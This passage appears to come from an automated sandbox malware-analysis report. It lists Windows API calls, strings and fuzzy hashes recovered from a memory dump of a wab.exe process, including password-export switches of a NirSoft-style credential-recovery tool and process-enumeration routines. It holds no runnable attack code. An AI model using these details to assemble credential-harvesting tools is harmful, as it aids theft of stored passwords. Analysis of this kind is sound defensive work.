                                • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                • malloc.MSVCRT ref: 004186FE
                                • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@$FullNamePath$malloc$Version
                                • String ID: |A
                                • API String ID: 4233704886-1717621600
                                • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _wcsicmp
                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                • API String ID: 2081463915-1959339147
                                • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                APIs
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                • API String ID: 2012295524-70141382
                                • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                APIs
                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$HandleModule
                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                • API String ID: 667068680-3953557276
                                • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                APIs
                                • GetDC.USER32(00000000), ref: 004121FF
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                • SelectObject.GDI32(?,?), ref: 00412251
                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                • SetCursor.USER32(00000000), ref: 004122BC
                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                • memcpy.MSVCRT ref: 0041234D
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                • String ID:
                                • API String ID: 1700100422-0
                                • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                APIs
                                • GetClientRect.USER32(?,?), ref: 004111E0
                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                • String ID:
                                • API String ID: 552707033-0
                                • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                APIs
                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                • memcpy.MSVCRT ref: 0040C11B
                                • strchr.MSVCRT ref: 0040C140
                                • strchr.MSVCRT ref: 0040C151
                                • _strlwr.MSVCRT ref: 0040C15F
                                • memset.MSVCRT ref: 0040C17A
                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                • String ID: 4$h
                                • API String ID: 4066021378-1856150674
                                • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$_snwprintf
                                • String ID: %%0.%df
                                • API String ID: 3473751417-763548558
                                • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                APIs
                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                • GetTickCount.KERNEL32 ref: 0040610B
                                • GetParent.USER32(?), ref: 00406136
                                • SendMessageW.USER32(00000000), ref: 0040613D
                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                • String ID: A
                                • API String ID: 2892645895-3554254475
                                • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                APIs
                                • LoadMenuW.USER32(?,?), ref: 0040D97F
                                  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                • DestroyMenu.USER32(00000000), ref: 0040D99D
                                • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                • GetDesktopWindow.USER32 ref: 0040D9FD
                                • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                • memset.MSVCRT ref: 0040DA23
                                • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                • DestroyWindow.USER32(00000005), ref: 0040DA70
                                  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                • String ID: caption
                                • API String ID: 973020956-4135340389
                                • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                APIs
                                Strings
                                • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$_snwprintf$wcscpy
                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                • API String ID: 1283228442-2366825230
                                • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                APIs
                                • wcschr.MSVCRT ref: 00413972
                                • wcscpy.MSVCRT ref: 00413982
                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                • wcscpy.MSVCRT ref: 004139D1
                                • wcscat.MSVCRT ref: 004139DC
                                • memset.MSVCRT ref: 004139B8
                                  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                • memset.MSVCRT ref: 00413A00
                                • memcpy.MSVCRT ref: 00413A1B
                                • wcscat.MSVCRT ref: 00413A27
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                • String ID: \systemroot
                                • API String ID: 4173585201-1821301763
                                • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: wcscpy
                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                • API String ID: 1284135714-318151290
                                • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                • String ID: 0$6
                                • API String ID: 4066108131-3849865405
                                • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                APIs
                                • memset.MSVCRT ref: 004082EF
                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                • memset.MSVCRT ref: 00408362
                                • memset.MSVCRT ref: 00408377
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$ByteCharMultiWide
                                • String ID:
                                • API String ID: 290601579-0
                                • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memchrmemset
                                • String ID: PD$PD
                                • API String ID: 1581201632-2312785699
                                • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                APIs
                                • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                • GetDC.USER32(00000000), ref: 00409F6E
                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                • GetWindowRect.USER32(?,?), ref: 00409FA0
                                • GetParent.USER32(?), ref: 00409FA5
                                • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                • String ID:
                                • API String ID: 2163313125-0
                                • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@$wcslen
                                • String ID:
                                • API String ID: 239872665-3916222277
                                • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpywcslen$_snwprintfmemset
                                • String ID: %s (%s)$YV@
                                • API String ID: 3979103747-598926743
                                • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                APIs
                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                • wcslen.MSVCRT ref: 0040A6B1
                                • wcscpy.MSVCRT ref: 0040A6C1
                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                • wcscpy.MSVCRT ref: 0040A6DB
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                • String ID: Unknown Error$netmsg.dll
                                • API String ID: 2767993716-572158859
                                • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                APIs
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                • wcscpy.MSVCRT ref: 0040DAFB
                                • wcscpy.MSVCRT ref: 0040DB0B
                                • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                  • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                • API String ID: 3176057301-2039793938
                                • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                APIs
                                Strings
                                • out of memory, xrefs: 0042F865
                                • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                • database %s is already in use, xrefs: 0042F6C5
                                • database is already attached, xrefs: 0042F721
                                • cannot ATTACH database within transaction, xrefs: 0042F663
                                • too many attached databases - max %d, xrefs: 0042F64D
                                • unable to open database: %s, xrefs: 0042F84E
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpymemset
                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                • API String ID: 1297977491-2001300268
                                • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
